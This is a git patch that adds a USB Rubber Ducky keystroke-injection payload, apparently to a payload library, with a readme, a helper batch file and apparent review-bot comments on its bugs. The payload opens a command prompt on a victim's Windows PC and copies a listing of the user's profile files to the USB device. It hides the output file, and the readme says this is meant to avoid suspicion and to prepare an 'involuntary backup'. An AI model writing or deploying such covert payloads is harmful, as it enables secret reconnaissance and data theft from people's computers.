From e84b1b13381d414d6c09b138c1ee8377e5cf2ef2 Mon Sep 17 00:00:00 2001 From: Alex007-CyberGuy <87278514+Alex007-CyberGuy@users.noreply.github.com> Date: Tue, 10 Aug 2021 22:24:42 +0200 Subject: [PATCH] Gain knowledge from the Tree (#12) * Useful Reconnaissance Payload New payload based on the potential of the "tree" command. * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Delete library/payloads/recon/Tree of Knowledge/Bonus directory I removed the exe * Update readme.md * Rename library/payloads/recon/Tree of Knowledge/readme.md to library/payloads/recon/Tree_of_Knowledge/readme.md * Rename library/payloads/recon/Tree_of_Knowledge/readme.md to library/payloads/recon/Tree of Knowledge/readme.md * Delete library/payloads/recon/Tree of Knowledge directory * Gain knowledge from the Tree Grabs the names of all the files on a victim's pc and hides them from prying eyes. --- .../recon/Tree_of_Knowledge/payload.txt | 13 ++++++++++ .../recon/Tree_of_Knowledge/readme.md | 26 +++++++++++++++++++ .../payloads/recon/Tree_of_Knowledge/show.bat | 2 ++ 3 files changed, 41 insertions(+) create mode 100644 library/payloads/recon/Tree_of_Knowledge/payload.txt create mode 100644 library/payloads/recon/Tree_of_Knowledge/readme.md create mode 100644 library/payloads/recon/Tree_of_Knowledge/show.bat diff --git a/library/payloads/recon/Tree_of_Knowledge/payload.txt b/library/payloads/recon/Tree_of_Knowledge/payload.txt new file mode 100644 index 0000000..9f1faca --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/payload.txt 
@@ -0,0 +1,13 @@ +REM Payload created by Alex007-CyberGuy +REM Check the readme.md file for more info on the payload and what is does. +DEFAULTDELAY 250 +DELAY 3000 +GUI r +DELAY 400 +STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd" +ENTER +DELAY 350 +STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit +ENTER +ALT SPACE +STRING n \ No newline at end of file diff --git a/library/payloads/recon/Tree_of_Knowledge/readme.md b/library/payloads/recon/Tree_of_Knowledge/readme.md new file mode 100644 index 0000000..28b77dc --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/readme.md 
@@ -0,0 +1,26 @@ +# Tree of Knowledge + +## Intro +This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky. +In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run. +This whole process is relatively discreet, bug free and can run and finish in a matter of seconds. +This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup". + +## Requirements: +- Only works on Windows (7/8/8.1/10) +- Twin Duck firmware must be loaded +- The ducky must be labeled as "USB" + +## Viewing files +In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it. + +## Troubleshooting +1. Experiment with those delays. +2. Make sure that you don't already have a recon file saved from that computer. +3. ALT SPACE doesn't work on some encoders. Try using the java based encoder. + +### Tip +The inject.bin still works even if it is marked as "hidden". + +That's it folks! +I spent quite long in order optimise this payload, so enjoy! diff --git a/library/payloads/recon/Tree_of_Knowledge/show.bat b/library/payloads/recon/Tree_of_Knowledge/show.bat new file mode 100644 index 0000000..d6bf5cd --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/show.bat @@ -0,0 +1,2 @@ +echo off: +attrib *.txt -h /s /d \ No newline at end of file
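Review bot: In the payload.txt hunk, the second STRING line has no check that `myd` was actually set by the `for /f ... findstr "USB"` loop, so on a host with no volume labelled "USB" the redirect target `%myd%/%computername%.txt` expands to `/COMPUTERNAME.txt`, i.e. the root of the current drive on the host, and `attrib +h` then hides that file there; the payload silently leaves a hidden directory listing on the target instead of failing, which is both a correctness bug and a forensic artifact the readme should mention. Note also that `cd %userprofile%` before `echo tree /a /f > echotree.cmd` means the listing covers only the user profile, not the whole machine, and that `echotree.cmd` is written to and deleted from the profile directory, so the payload does touch the host filesystem. Minor: the second REM line reads "what is does" and should be "what it does", and the file lacks a trailing newline ("\ No newline at end of file").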
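Review bot: In the readme.md hunk, the Intro overstates what the payload does: it says it "copies the names of all the files on a victim's PC", but the payload runs `tree /a /f` from `%userprofile%`, so only the current user's profile tree is listed; please align the description with the code. Troubleshooting item 2 ("Make sure that you don't already have a recon file saved from that computer") should state the reason: the output file is hidden with `attrib +h`, and cmd's `>` redirection refuses to overwrite a hidden file, so a second run on the same computer fails without any visible error. The Requirements section should also say that `findstr "USB"` is case-sensitive, so the volume label must be exactly "USB", and the claim "bug free" should be dropped given the unhandled no-drive-found case in payload.txt.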
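Review bot: In the show.bat hunk, the first line `echo off:` is a typo: it neither suppresses echo nor does anything useful, since the trailing colon makes cmd print the literal text "off:"; it should be `@echo off`. The second line `attrib *.txt -h /s /d` recurses through every subdirectory of wherever the script is run, so it un-hides all .txt files below that point rather than just the recon files on the ducky root; the readme says to run it from the root, so either document that the recursion is intentional or drop `/s /d`. The file also has no trailing newline ("\ No newline at end of file").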